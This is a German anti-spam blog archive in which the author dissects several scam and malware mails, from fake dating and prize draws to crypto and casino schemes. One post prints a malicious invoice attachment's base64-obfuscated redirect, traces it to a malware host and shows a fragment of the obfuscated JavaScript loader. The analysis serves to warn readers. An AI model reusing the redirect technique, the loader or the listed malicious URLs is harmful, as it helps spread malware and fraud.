Schlagwortarchiv „Cloud“

I liked it so much… I want more

Freitag, 4. November 2022

These girls want to find a guy

< 1 / 5 >
Open her profile Cheraghearzu 10 miles from you

So so, dieses keck präsentierte Möslein¹ ist also nur zehn Meilen von mir entfernt? Was für Meilen sind es denn? Seemeilen, englische Meilen, sächsische Landvermessermeilen, metrische skandinavische Meilen oder deutsche Landmeilen? Nicht, dass das einen großen Unterschied machte, denn der Abstand zu mir ist allemal groß genug. Obwohl: Zehn Lichtjahre wären noch besser. 😉️

Die Links in der Spam führen übrigens alle in die Google-Cloud², denn das kostet den Spammer ja kein Geld. Dort ist ein PDF abgelegt, das in seiner gar nicht zur drastisch-deutlichen Mail passenden Unschärfe wohl sicher durch die automatischen Pornofilter bei Google kommt. Das PDF hat nur eine Seite, und die sieht so aus:

Was, Dating? Mit einer Spammerin? Och nö! 🤭️

Was von irgendwelchen Dating-Websites zu halten ist, auf denen es nur Frauen gibt, sollte eigentlich jedem Menschen mit Gehirn klar sein: Es ist Betrug. Die Frauen existieren nicht. Man hat es die ganze Zeit mit Bots oder mit Animateuren zu tun, die oft zwei Dutzend Leute gleichzeitig bespaßen. Das Geld, mit dem man die gesalzenen Preise bezahlt, geht an Kriminelle. Persönliche Daten, die man angibt (mit sexuellen Interessen, lecker!) werden an andere Kriminelle verkauft. Interessierte Frauen sind Trickbetrügerinnen, die einem noch mehr Geld aus der Tasche ziehen. Ich will es mal so sagen: Das Bordell ist preiswerter, und da gibt es etwas für das Geld. 💸️

Wer mir das nicht glaubt, kann sich ja mal fragen, was diese Frauen eigentlich immer machen, dass es dort keine Männer gibt… 🙃️

Die lustige „Frucht des Jugendschutzes“ im Foto aus der Spam ist natürlich von mir eingefügt, im pornografischen Originalbild hat nichts den Blick auf die Vulva verstellt.

²Ich habe den Missbrauch bei Google gemeldet und bin mal gespannt, ob Google inzwischen mehr Interesse an der Bekämpfung von Spam und Internetkriminalität hat. Kostenlose Cloud-Angebote als Hilfsmittel der Spammer werden in den nächsten Jahren eine Pest.

Ihre Rechnung 146648577349 von der Böttcher AG

Freitag, 30. September 2022

⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️

Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;

So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️

Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️

Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962

Lieber Kunde,

Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️

beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.

Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:

$ cat Rechnung-b-a_0000003198.html 
<body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');">
$ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo 
https://3t8.at/apD8qloS
$ mime-header https://3t8.at/apD8qloS | grep -i ^location
location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf
$ _

Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip
$ zip -sf 5640955135.zip 
Archive contains:
  xi1132111.js
Total 1 entries (418953 bytes)
$ unzip 5640955135.zip 
Archive:  5640955135.zip
  inflating: xi1132111.js  
$ _

Dettelbach ist überall! 😱️

Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…

$ wc xi1132111.js 
     2    373 418953 xi1132111.js
$ _

…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️

Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:

$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo 
function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d',
'\x6a\x70\x66\x57\x51',
'\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c',
'\x56\x6b\x72\x7a\x62',
'\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c',
'\x4f\x6f\x4d\x6c\x57',
'\x4d\x41\x58\x41\x73',
'\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63',
'\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d',
'\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c',
'\x6a\x61\x61\x67\x70',
'\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c',
'\x61\x77\x6e\x6c\x69',
'\x49\x65\x52\x45\x67',
'\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69',
'\x72\x4d\x79\x54\x48',
'\x49\x6d\x77\x47\x67',
'\x42\x69\x74\x77\x49',
'\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b',
'\x77\x7a\x77\x47\x71',
'\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64',
'\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c',
'\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41',
'\x5c\x6f\x5c\x78\x5c\x63\x5c
$ _

Von einem neuronalen Netzwerk generiertes Bild einer verlassenen industriellen Anlage, die überall mit Blut verschmiert ist So etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️

Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️

Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️

Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮‍♂️️

Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.

Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.

Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.

Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.

Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.

Mit freundlichen Grüßen

⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️

=?UTF-8?Q?=EF=BB=BF?=

Montag, 22. August 2022

Oh, mal wieder ein Spammer, der damit überfordert ist, das Encoding für den Betreff anzugeben. 🤦‍♂️️

Und, was schreibt dieser Idiot? 🤔️

https://1drv.ms/w/s!AjhqRCBzfr8uay1pJ9y0YaINhWk

Einen Link schreibt der Idiot. Ohne Kontext. Einfach ein Link zum Anklicken, weil ein Link aus einer Spam immer so schön angeklickt werden kann. So ein feiner Link! Für die Zielgruppe „Vielleicht kommt ja ein leckerer Keks aus dem Computer, wenn man auf den Link klickt“. 🎯️

Hoffentlich ist niemand so dumm, auf so einen Link zu klicken! Es ist sowieso gefährlich, in eine E-Mail zu klicken¹, und es ist noch viel gefährlicher, wenn diese E-Mail zwei Kilometer gegen den Wind nach illegaler und asozialer Spam stinkt. 🖱️⚠️

Es geht direkt in die Microsoft-“Cloud“. Dort ist ein Word-Dokument abgelegt. Der Spammer konnte wohl nicht anders. In der E-Mail war kein Platz mehr. Er muss unbedingt mal Mailpapier nachbestellen. 🤡️

Das Word-Dokument sieht auch aus, und zwar so:

Der Text mit dem blauen Hintergrund ist ein Link, darauf kann man dann noch einmal klicken. Vermutlich war im Word-Dokument auch kein Platz mehr. 😁️

Wer das macht, landet auf der Website in einer Domain…

$ surbl de.heavyexperience.link
de.heavyexperience.link	LISTED: ABUSE
$ lynx -dump http://de.heavyexperience.link/DE/1730/?bet=28368923 | sed -n 15,30p
             Hunderte von Menschen in Deutschland reich werden.

   (ZEIT) – Deutscher chemiker Joachim Sauer ist dafür bekannt, dass er
   immer sagt, was er denkt und ehrlich zugibt, wie er sein Geld verdient.

   Letzte Woche trat er bei Late Night Berlin auf und kündigte ein neues
   "Vermögensschlupfloch" an, das seiner Ansicht nach jeden innerhalb von
   3-4 Monaten in einen Millionär verwandeln kann. Müller forderte alle in
   Deutschland auf, diese erstaunliche Gelegenheit zu nutzen, bevor die
   Großbanken sie endgültig zum Erliegen bringen. Joachim riet allen
   Deutschen, diese fantastische Möglichkeit zu nutzen, bevor sie von den
   Großbanken permanent blockiert wird.

   Und tatsächlich rief die Deutsche Bank Minuten nach Beendigung des
   Interviews an und versuchte, die Ausstrahlung von Sauer' Interview zu
   verhindern – aber es war schon zu spät.
$ _

…die schon längst wegen massenhafter Spam auf allen Blacklists dieser Welt steht. Das hindert den Betreiber dieser Website aber nicht daran, trotz der völlig unpassenden Domain so zu tun, als sei er die „Zeit Online“. Allerdings wollen die Inhalte nicht so gut passen, denn hier wird nur ellenlang und mit Fotos, die eher nach hirnloser Gossenpresse aussehen, erzählt, wie jedes Suppenhuhn vollautomatisch und ohne jede Kenntnisse mit Bitcoin-Spekulation und dem „Gewinn code System“ von Spamboy Silas Schmidt reich werden kann:

Natürlich ist das alles Lüge. Man kann sich nicht einfach Geld aus der Steckdose ziehen. Das Geld, dass man auf der angeblichen Bitcoin-Plattform einzahlt, ist futsch. Die angezeigten Zahlen kann man nicht auszahlen lassen. Wenn man es versucht, soll man noch eine Gebühr bezahlen, damit noch mehr Geld futsch ist. Es ist ein Betrug. 💸️

Aber das es kriminell ist, sieht man ja schon an der illegalen und asozialen Spam. 💡️

¹Das gilt auch, wenn man dem Absender vertraut, denn die Absenderadresse einer E-Mail kann beliebig gefälscht werden. Deshalb sollte man digitale Signaturen verwenden. Und niemals in eine E-Mail klicken, die nicht digital signiert ist oder nicht über einen anderen Kanal als E-Mail vereinbart wurde. Dettelbach ist überall.

Gewinne jetzt einen Einkaufgutschein im Wert von 100�!

Freitag, 10. Juni 2022

Hey, Spammer! Wenn man schon zu doof ist, das Encoding für den Betreff richtig anzugeben, dann könnte man ja einfach „€“ als „Euro“ ausschreiben, und schon sieht es nicht mehr lächerlich aus. Aber leider hast du die Flucht ergriffen, als der Verstand verteilt wurde. 🤭️

Da reißt es dann auch das tolle Bild [habe ich auch in Originalgröße] nicht mehr raus. Zumal das Bild auch seine Schwächen hat; kleine Fehler, die der echten Deutschen Bahn niemals passieren würden. Zum Beispiel der rote Streifen am ICE. Der ist jetzt schon seit ein paar Jahren grün, wie man übrigens in jeder Reklame der Deutschen Bahn sehen kann. Aber woher sollst du das wissen? Du willst ja nicht bahnfahren, du willst von Spam-Gewinnspielen leben. Oder genauer gesagt: Vom Missbrauch eingesammelter Daten, mit denen du deine Betrugsnummern und deinen Datenhandel machst. 🤢️

Und wenn dann im Betreff von einem „Einkaufsgutschein“ und in der eigentlichen Spam von einer „Jahreskarte der Deutschen Bahn“ die Rede ist, dann wird jedem Menschen mit einem Intelligenzquotienten über der Zimmertemperatur klar, dass du dir mit deinem Schmeißfliegengehirn nicht einmal während des Schreibens deiner asozialen, kriminellen Drecksspam merken kannst, um was es eigentlich in deinem eigenen Betrug gehen soll. 🤣️

Herzlichen Glückwunsch!
$salutation_de_gender

Genau mein Name! 👏️

Spammer, du Dickdarmakrobat! Halten wir mal fest: Mit der Angabe eines Encodings für den Betreff bist du intellektuell überfordert; ein Betreff, der irgendwie wenigstens so gut zum Inhalt deiner Spam passt, dass da nichts völlig anderes steht, ist dir nicht eingefallen; beim schnellen Zusammenkopieren eines tollen Bildchens für deinen Schwindel zeigt sich, dass du die Marke, in deren Namen du spammst, überhaupt nicht kennst; und das Spamskript, das du für deine Spamaktion benutzt, hast du auch nicht richtig verstanden. Vielleicht solltest du einfach nicht spammen. Vielleicht solltest du einfach etwas tun, was deiner geistigen Entwicklung näherkommt. Zum Beispiel Zombie-Darsteller. Da brauchtest du dich nicht zu verstellen, könntest daran nicht scheitern und löstest beim Betrachten nicht so viel Heiterkeit aus. 😁️

Das Glück war auf Ihrer Seite! Ihre E-Mail-Adresse wurde ausgesucht, um an unserem Gewinnspiel teilzunehmen. Sie haben die wundervolle Chance ein Deutsche Bahn Jahresticket 1. Klasse zu gewinnen! Egal, ob Arbeitsweg, Schulweg oder Urlaub. Die Bahn bringt Sie dort hin.

Das ist ja toll, dass ich – oder genauer: meine E-Mail-Adresse – die Chance habe, etwas zu gewinnen. Nur gewonnen habe ich nichts. Egal, ob Dummheit, Idiotie, Blödgier oder Betrug: Leere Versprechungen von Spammern bringen mich dort hin. Und der ICE bringt mich zur Schule. Ideal für Kinder mit Schulwegen über zweihundert Kilometer. 🚆️

Ich hoffe, dass inzwischen jeder Mensch bemerkt hat, dass diese Spam nicht von der Deutschen Bananenbahn kommt. Sie kommt von einem asozialen Spammer. Und wer darauf reinfällt und…

Was Sie tun müssen? Ganz einfach. Bestätigen Sie einfach Ihre Teilnahme, indem Sie auf den unten stehenden Button klicken.

Aber warten Sie nicht zu lange! Das Gewinnspiel endet, sobald alle Gewinner ausgelost wurden.

Herzliche Grüße

Der Wettbewerb richtet sich nur an Personen, die in Deutschland leben und über 18 Jahre alt sind.

Ja, ich will mitmachen

…klicki-klicki macht, weil er in einer E-Mail dazu aufgefordert wurde, der hat verloren. Natürlich führt der Link nicht in die Domain der Deutschen Bahn, sondern zur viel weniger Vertrauen erweckenden Domain waltcheck (punkt) com, die bereits…

$ surbl waltcheck.com
waltcheck.com	LISTED: ABUSE
$ _

…wegen Spam auf allen einschlägigen Blacklists steht. 💀️

Zurzeit wird die betrügerische Website…

$ host waltcheck.com
waltcheck.com has address 34.76.75.249
$ whois 34.76.75.249 | grep -i ^comment
Comment:        *** The IP addresses under this Org-ID are in use by Google Cloud customers *** 
Comment:        
Comment:        Direct all copyright and legal complaints to 
Comment:        https://support.google.com/legal/go/report
Comment:        
Comment:        Direct all spam and abuse complaints to 
Comment:        https://support.google.com/code/go/gce_abuse_report
Comment:        
Comment:        For fastest response, use the relevant forms above.
Comment:        
Comment:        Complaints can also be sent to the GC Abuse desk 
Comment:        (google-cloud-compliance@google.com) 
Comment:        but may have longer turnaround times.
Comment:        
Comment:        Complaints sent to any other POC will be ignored.
$ _

…in der Google-Cloud gehostet. Vom Schreiben einer Abuse-Mail an Google sehe ich ab, da sich dies in der Vergangenheit immer wieder als fruchtlose Zeitverschwendung erwiesen hat, und auf die Extraportion Kafka in den angegebenen Meldeformularen verzichte ich nach ebenfalls reichlich gemachten Erfahrungen gern. Beides scheint direkt nach /dev/null zu gehen, ohne dass sich noch ein Mensch damit beschäftigt. Google hat leider kein erkennbares Interesse an der Bekämpfung von Spam und Internetkriminalität. Vermutlich ist Google zu stark damit beschäftigt, seine Suchmaschine und sein YouTube durchzuzensieren. Google will sein Geschäft machen, und die Kosten und Aufwände, die bei seinem Geschäft anfallen, will Google höchst asozial der ganzen restlichen Welt aufbürden. Das ist genau der stinkende Charakter, der Menschen mit weniger Kapital zu asozialen Spammern macht, und es ist genau so widerlich. Google ist damit ein guter und zuverlässiger Freund von Kriminellen aller Art geworden, vom schäbigen Vorschussbetrüger aus Nigeria bis hin zum hier vorliegenden Datensammler, Adresshändler und mutmaßlich auch Affiliate-Lumpenkaufmann, der seinen Opfern sicherlich auch schnell weitere große Nachteile als „Gewinnchancen“ aufdrängeln wird, wenn sie bei diesem Köder angebissen haben. 🎣️

Die Daten, die man dort eingibt, um eine Chance auf einen möglichen Gewinn zu haben, gehen direkt an Kriminelle. Sie sind für einen betrügerischen Identitätsmissbrauch ausreichend. Der Ärger, den man sich in nur einer Minute dummen Klickens und Tippens holen kann, wird von der sehr überschaubaren „Gewinnchance“ – es ist nicht bekannt, wann die Verlosung stattfindet, wie viele Teilnehmer es gibt und unter welchen Umständen sie einfach ausfallen könnte, so dass ich davon ausgehe, dass da im Zweifelsfall gar nichts verlost wird – nicht aufgewogen. 💩️

Am meisten Glück haben die Menschen, die diese Spam einfach löschen. 🍀️

INSERT FOOTER HERE

Ach ja, warum sollte der Spammer sich Mühe geben. Wenn er sich Mühe geben wollte, könnte er ja gleich arbeiten gehen. 🛠️

Entf! 🗑️

Wir freuen uns sehr, dieses brandneue Online-Casino vorzustellen, das für Sie erstellt wurde!

Montag, 11. April 2022

Wie jetzt? Ein ganzes Casino nur für mich? Mit einer Kasse, wo nur ich mein Geld abgeben darf, um es gegen angezeigte Zahlen einzutauschen, die viel größer sind, als der Betrag den ich eingezahlt habe? Und wo ich die ganze Zeit so richtig dolle wichtig bin? Das ist ja toll! 🤭️

Was ist los, Betrüger? Läuft das Bitcoin-Geschäft nicht mehr? Greifst du deshalb wieder auf die „gute alte“ Casino-Spam zurück? 😁️

You are eligible for a something special today

400% BONUS UP TO 1000€

Hey, Spammer! Ich habe das eben als Satire gemeint. 🤦‍♂️️

Hallo gammelfleisch ,

Der Name stimmt! 👍️

Ein riesiges 400% Willkommensbonus erwartet Sie, wenn Sie Ihr Konto beim besten neuen Casino des Jahres 2021 eröffnen!

Was, nicht die beste Zockhölle des Jahres 2022? Oder hast du mal wieder deinen Kalender nicht richtig gestellt, Spammer? 📆️

Aber es ist doch schön, dass mir gleich in der illegal und asozial gespammten Reklame gesagt wird, dass da viermal so viel Guthaben angezeigt wird, wie ich Geld eingezahlt habe. So weiß ich schon vor meinem ersten „Spiel“ an diesen vom Betreiber beliebig und unentdeckbar manipulierbaren Abzockprogrammen, was dieses hochnotwichtig angezeigte „Geld“ wert ist: Nichts. 💩️

Spielen Sie über 1000 exklusive Spiele von Aristocrat, NetEnt, Playtech, Novomatic und viele mehr mit a 400% bis zu €1000 Willkommensbonus bei Ihrer ersten Einzahlung!

Krass! Über tausend verschiedene grafische Darstellungen für die gleiche spambetriebene Abzocke! 🎰️

Um diese Einladung zu nutzen:

1. Visit CasinoBTC and open your free acount
2. Machen Sie eine Einzahlung mit dem Code WELCOME1
3. Holen Sie sich bis zu €1000 extra!

BONUS ANFORDERN

* Um den Bonus zu erhalten, müssen Sie 20€ (3 mBTC) oder mehr mit dem Gutscheincode einzahlen
* Der maximale Bonusbetrag beträgt 1000€ (1000mBTC)
* Geschäftsbedingungen gelten

Es ist egal, ob man auf „Bonus anfordern“ oder auf „Geschäftsbedingungen“ klickt, der Link ist der gleiche. Natürlich hat unser Spammer keinen direkten Link gesetzt, denn er wollte doch so gern seine Affiliate-ID verbergen, und diese Spamfilter sind ja auch immer sehr lästig:

$ location-cascade https://link.nn.ru/tfO
     1	https://belvoirty.com/?a=4616&oc=14518&c=40807&m=3&s1=
     2	https://casinobtc.postaffiliatepro.com/scripts/ucx7vhx?a_aid=lola&a_bid=8c4cfc91&chan=de&data1=246413386&data2=4616
     3	https://www.casinobtc.bet/de/lp2/bor_casinobtc?transactionId=246413386&a=4616
$ host casinobtc.bet
casinobtc.bet has address 35.240.34.154
casinobtc.bet mail is handled by 10 mx.zoho.com.
casinobtc.bet mail is handled by 20 mx2.zoho.com.
casinobtc.bet mail is handled by 50 mx3.zoho.com.
$ whois 35.240.34.154 | grep -i ^comment | sed 9q
Comment:        *** The IP addresses under this Org-ID are in use by Google Cloud customers *** 
Comment:        
Comment:        Direct all copyright and legal complaints to 
Comment:        https://support.google.com/legal/go/report
Comment:        
Comment:        Direct all spam and abuse complaints to 
Comment:        https://support.google.com/code/go/gce_abuse_report
Comment:        
Comment:        For fastest response, use the relevant forms above.
$ _

Das ganze spambeworbene „Casino“ scheint in der Google-Cloud zu liegen. Aufgrund meiner bisherigen Erfahrungen mit gemeldetem kriminellen Missbrauch von Google-Diensten – Google hat sich dabei stets als eine Unternehmung gezeigt, die Spammer und Trickbetrüger ungestört über viele Monate gewähren lässt und sich damit zum dicksten und zuverlässigsten Kumpel der Verbrecher macht – sehe ich heute davon ab, mir eine Runde Kafka zu holen, indem ich eine Abuse-Mail schreibe. Einmal ganz davon abgesehen, dass Google mich und andere Menschen immer dazu nötigt, eine Webformular auszufüllen, in dem man kaum Möglichkeiten hat, den Sachverhalt kurz und klar darzulegen. ☹️

Casinobtc.bet wird von Crypto Nation of Abraham De Veerstraat 7, PO Box 840, Willemstad,, Curacao betrieben und gehört vollständig zu Stiker Tech Limited Avlonos,1, MARIA HOUSE, 1075 Nicosia Cyprus. Casinobtc.bet wird betrieben unter der Master Lizens No. No.365/JAZ unter der Aufsicht von Curacao . Für aufkommende Fragen, bitte wenden Sie sich an unseren Kundenservice 24/7

Nein, meine Fragen sind bereits beantwortet. Schon mit der Spam. 🤮️

Unsubscribe

Voll das „Casino“ betreiben, aber nicht einmal dazu imstande, einen Link auf das Wort „Unsubscribe“ zu legen! 🤡️

Jetzt Auto bewerten, wenn du dein Auto verkaufen möchtest

Sonntag, 10. April 2022

Aber ich habe gar kein Auto.

Wird dieser Newsletter nicht richtig angezeigt? Dann können Sie diesen auch online ansehen.

Sie möchten keine Newsletter mehr erhalten? Dann können Sie sich hier austragen.

Noch bevor mir der Spammer überhaupt sagt, was er mir Tolles anzubieten hat, sagt er mir, dass es eine Spam ist, indem er mich auffordert, die Spam im Browser anzuschauen oder klicki-klicki zu machen, wenn ich seinen unverlangt zugestellten Shitletter nicht weiter bekommen möchte. 🖱️

Wir kaufen jede Marke, jedes Modell. Online Autodetails eingeben & Verkaufspreis erhalten! Schnell & Einfach. 7 Tage gültigen Top-Preis erhalten! Jetzt kostenlos bewerten.

Schnell, einfach und gefährlich… also ungefähr so, wie unerfahrene Teenager an den Geschlechtsverkehr rangehen. 😁️

Verkaufe dein Auto
zum Bestpreis

Und für die, denen immer noch nicht klar ist, dass ihnen ein Preis für ihr Rostblech geboten wird, wird noch einmal darauf hingewiesen, dass ihnen ein Preis für ihr Rostblech geboten wird. Denn die mit der schnellen Auffassungsgabe sind nicht die Zielgruppe dieser asozialen und illegalen Spammer, sondern die Dummen und Naiven. Die kann man ja auch viel besser abziehen. 🤗️

Das eingebettete Bild mit einer Angabe einer Domain – es ist übrigens in der Amazon-Cloud abgelegt – wird natürlich nicht in der Website unter der angegebenen Domain gehostet und wurde vermutlich von irgendwo im Web einfach klebefinger mitgenommen. Es hat nur den Zweck, einen falschen Eindruck beim Empfänger und Leser dieser Spam zu erwecken. 🤥️

Schnell, sicher, einfach – Mit nur wenigen Klicks erfährst du den aktuellen Marktpreis deines Autos! Online Autodetails eingeben & Verkaufspreis erhalten!

Und deshalb wird der Kram auch gleich nochmal wiederholt, und diesmal auch wieder mit „schnell, einfach und gefährlich“. 😩️

Damit man sieht, wie schnell und einfach das ist, wird ein Screenshot einer Bildschirmmaske in die Mail eingebettet, damit dumme und naive Menschen denken, sie könnten gleich loslegen. Natürlich ist das nur ein verlinktes Bild. Zum Link komme ich gleich noch einmal.

Und ja, es ist gefährlich, in eine Spam zu klicken. Wirklich. Der Link führt immer auf die Websites von Leuten, denen das geltende Recht völlig gleichgültig ist. Woran man das erkennt? Na, daran, dass sie spammen. Das ist bereits illegal. Es gibt keine legale Spam.

Der Link geht nicht etwa in die Domain, die eben noch in einem eingebetteten Bild angedeutet wird, sondern in eine Subdomain von premium (strich) gewinnspiele (punkt) com, was doch gleich viel weniger Vertrauen einflößt. Tatsächlich befindet sich diese Domain…

$ surbl premium-gewinnspiele.com
premium-gewinnspiele.com	LISTED: ABUSE 
$ _

…bereits auf den einschlägigen Blacklists, weil sie von Spammern immer wieder in illegaler und asozialer Spam missbraucht wurde. Mehr muss man dazu nicht mehr sagen. Wer mit solchen Leuten ins Geschäft kommt, hat verloren. 💸️

Natürlich hängt eine eindeutige ID am Link, damit man an den Spammer „zurückfunkt“, dass die Spam angekommen ist, gelesen wurde und sogar beklickt wurde. Danach ist nie wieder Ruhe im Postfach. 🚾️

Sie erhalten diese Nachricht an die E-Mail-Adresse [Mailadresse, die ich niemals aktiv benutzt habe und die für normale Leser völlig unsichtbar ist, die ich aber für Harvester-Skripten im Web ausgelegt habe], weil Sie unsere Dienste in Anspruch nehmen oder an Gewinnspielen der Premium Performance Mail AG oder unserer Kooperationspartner teilgenommen haben.

Das ist eine Lüge. Ich erhalte diese Spam, weil die damit zugeschissene Mailadresse automatisch im Web eingesammelt werden konnte. 🤥️

Die Angebote sind kommerzielle Anzeigen der jeweiligen Werbekunden, die für den jeweiligen Inhalt verantwortlich sind. Bei Fragen zu den Angeboten haben, wenden Sie sich bitte an den in der Anzeige genannten Anbieter.

Krass, der Spammer distanziert sich von seiner eigenen illegalen Spam! Nur für den Fall, dass jemand denkt, es könnte ja doch seriöser sein als es auf dem ersten Blick aussieht. 🤭️

Die Premium Performance Mail AG ist ausschließlich Versender dieser Nachricht.

„Ich spamme nur, ich habe nix mit der Spam zu tun“. Diese Lust, einem Typen, der so eine Intelligenzbeleidigung schreibt, immer wieder die Faust ins blöde Fressbrett zu hämmern. Und dazu zu sagen: „Ich boxe nur, ich habe nichts mit deinen Schmerzen zu tun“. 🥊️

Bitte antworten Sie nicht auf diese Mail. Um in Zukunft keine Informationen mehr von dieser Adresse zu erhalten, dann klicken Sie bitte hier, um sich abzumelden.

Der Absenderadresse und die angegebene Antwortadresse dieser E-Mail sind keine Antwortmöglichkeit, sondern gehen direkt in die Tonne. Bitte einfach auf „Click here“ klicken, um etwas abzubestellen, was niemals bestellt wurde.

Haben Sie Verständnis, dass die Abmeldung bis zu 48 Stunden dauern kann.

Bitte haben sie Verständnis dafür, dass wir nichts programmieren wollten, um ihre Mailadresse nach einer so genannten „Abmeldung“ direkt aus unserem Datenbestand zu entfernen. So etwas machen wir in Handarbeit. Oder genauer: So etwas macht ein Billiglöhner für uns in Handarbeit. Mühsam. Obwohl es eine Maschine besser kann. Und schneller. Und billiger. Dieses Programmieren von Computern hirnt immer so, und eigentlich wollen wir das auch gar nicht so richtig lernen, denn wir wollen Computer ja nur zum Spammen benutzen. 🖕️

NEIN, ich habe das Verständnis nicht. 😡️

Diesen kostenlosen Newsletter erhalten Sie von der Premium Performance Mail AG.
The Picasso Building, Caldervale Road, Wakefield, West Yorkshire, United Kingdom. Geschäftsführung: Caroline Wange

Liebe Meteoriten, nutzt eure Chance! 🌠️

Bei Fragen zu unseren Dienstleistungen oder über die Herkunft Ihrer Daten wenden Sie sich bitte an support@premium-performance-mail.com

Bitte nicht an die Absenderadresse antworten! Bitte auch nicht an die eigens eingetragene Antwortadresse antworten! Bitte in die Spam klicken! 💩️

y͏o͏u͏ a͏r͏e͏ t͏h͏e͏ c͏h͏o͏s͏e͏n͏ o͏n͏e͏! T͏o͏d͏a͏y͏✮gammelfleisch✮

Sonntag, 19. Dezember 2021

Wie, werde ich jetzt dem Satan in die Flammen geopfert? 🔥️

ebay $90

Date of issue:01/12/2021
Order Number: 300617-50571355
Account: gammelfleisch@tamagothi.de
Date of expiry:20/12/2021

